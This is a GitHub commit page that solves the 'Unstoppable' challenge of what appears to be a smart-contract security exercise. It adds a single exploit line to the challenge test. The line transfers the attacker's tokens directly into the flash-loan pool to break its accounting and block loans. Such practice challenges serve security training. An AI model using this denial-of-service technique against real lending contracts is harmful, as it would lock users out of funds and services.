Skip to content

Commit

Permalink
solved challenge OpenZeppelin#1
Browse files Browse the repository at this point in the history
  • Loading branch information
assafom committed Aug 12, 2021
1 parent 6797353 commit 5edeb2b
Show file tree
Hide file tree
Showing 2 changed files with 35 additions and 5 deletions.
39 changes: 34 additions & 5 deletions package-lock.json

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

1 change: 1 addition & 0 deletions test/unstoppable/unstoppable.challenge.js
Original file line number Diff line number Diff line change
Expand Up @@ -40,6 +40,7 @@ describe('[Challenge] Unstoppable', function () {

it('Exploit', async function () {
/** YOUR EXPLOIT GOES HERE */
await this.token.transfer(this.pool.address, INITIAL_ATTACKER_BALANCE, { from: attacker });
});

after(async function () {
Expand Down

0 comments on commit 5edeb2b

Please sign in to comment.